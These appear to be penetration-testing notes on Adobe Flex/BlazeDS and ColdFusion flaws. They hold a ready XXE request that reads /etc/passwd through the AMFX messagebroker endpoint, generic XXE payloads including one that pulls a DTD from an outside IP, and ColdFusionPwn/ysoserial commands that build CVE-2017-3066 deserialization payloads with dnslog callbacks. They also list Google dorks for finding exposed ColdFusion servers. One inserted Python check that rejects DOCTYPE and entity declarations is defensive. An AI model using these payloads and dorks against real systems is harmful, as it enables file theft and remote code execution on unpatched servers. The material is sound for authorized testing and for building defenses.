Affected component: the HTTPChannel servlet, specifically
"mx.messaging.channels.HTTPChannel" and
"mx.messaging.channels.SecureHTTPChannel"
in the package flex-messaging-common.jar.
HTTPChannel communicates using data in AMFX format (the XML form of AMF).
The endpoints are defined in the file Flex/WEB-INF/services-config.xml.
By default HTTPChannel is mapped to the following endpoints:
- /messagebroker/http
- /messagebroker/httpsecure
Different frameworks (for example BlazeDS and Adobe LiveCycle Data Services) map them to different paths.
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
Reference:
http://mail-archives.apache.org/mod_mbox/flex-users/201511.mbox/%[email protected]%3E
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<!DOCTYPE foo PUBLIC "-//VSR//PENTEST//EN"
"http://49.x.y.z:8888/protected-service"><foo>Some content</foo>
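Added, defender-side example, not code from these notes or from any of the referenced projects: a pre-parse gate written in Python with the standard-library expat parser that refuses any AMFX request body carrying a DOCTYPE or entity declaration, as the requests above do, before any entity can be declared or resolved. The function name amfx_body_is_safe and the two sample bodies are my own constructions.

```python
import xml.parsers.expat

AMFX_NS = "http://www.macromedia.com/2005/amfx"

# Constructed sample bodies (not captured traffic): a minimal AMFX CommandMessage,
# and the same shape carrying a DOCTYPE that declares an external entity.
CLEAN_AMFX = b"""<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body><object type="flex.messaging.messages.CommandMessage">
<traits><string>operation</string></traits><int>5</int>
</object></body></amfx>"""
XXE_AMFX = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body><object type="flex.messaging.messages.CommandMessage">
<traits><string>body</string></traits><string>&x3;</string>
</object></body></amfx>"""

class _Rejected(Exception):
    """Raised from an expat callback to abort parsing at the first DTD construct."""

def amfx_body_is_safe(body: bytes) -> tuple:
    """Gate an application/x-amf (AMFX) body before the real AMFX decoder sees it.

    Returns (True, "ok") only if the body is well-formed, declares no DOCTYPE or
    entity, and its root is <amfx> in the AMFX namespace. The DOCTYPE callback
    fires before the internal subset is read, so no entity is declared or resolved.
    """
    parser = xml.parsers.expat.ParserCreate(namespace_separator="}")
    root = []  # expanded name of the first start element, "namespace}local"
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise _Rejected(f"DOCTYPE '{name}' not allowed in AMFX")

    def on_entity(*_):
        raise _Rejected("entity declaration not allowed in AMFX")

    def on_start(name, attrs):
        if not root:
            root.append(name)
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    try:
        parser.Parse(body, True)
    except _Rejected as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    if root != [AMFX_NS + "}amfx"]:
        return False, f"unexpected root element: {root[0] if root else None}"
    return True, "ok"
```

Placing such a check in front of the AMFX endpoint, and logging its rejections, gives both a mitigation and a detection signal for the /messagebroker/http paths listed above.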
Affected versions:
- Adobe ColdFusion 2016 Update 3 and earlier
- Adobe ColdFusion 11 update 11 and earlier
- ColdFusion 10 Update 22 and earlier
Two exploitation approaches:
- Implementing the Externalizable interface (org.apache.axis2.util.MetaDataEntry)
- Arbitrary setter methods (org.jgroups.blocks.ReplicatedTree)
These correspond to the tool's two switches, -e and -s, respectively.
$ java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.8-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "ping 111.oqp5zz.dnslog.cn" poc.amf
$ java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.8-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -s CommonsBeanutils1 "ping 222.oqp5zz.dnslog.cn" poc2.amf
- Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
- https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html
- Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12
- https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md
- Adobe's official security advisory
- ColdFusion for Pentesters
- http://web.archive.org/web/20101226181618/http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
- filetype:cfm "cfapplication name" password
- inurl:login.cfm
- intitle:"Error Occurred" "The error occurred in"
- filetype:cfm
- intitle:"ColdFusion Administrator Login"
- intitle:"Index of" cfide
- inurl:/CFIDE/componentutils/
- https://github.com/codewhitesec/ColdFusionPwn/tree/master/src/main/java
- https://github.com/mbechler/marshalsec/blob/6e5f2a7974a62fcd0e5bbbf8df64774a50db2eb8/src/main/java/marshalsec/BlazeDSAMF3AM.java
- https://github.com/mbechler/marshalsec/blob/0471b932a09c8aca21876de80c8abf65b251c9ca/src/main/java/marshalsec/BlazeDSAMFX.java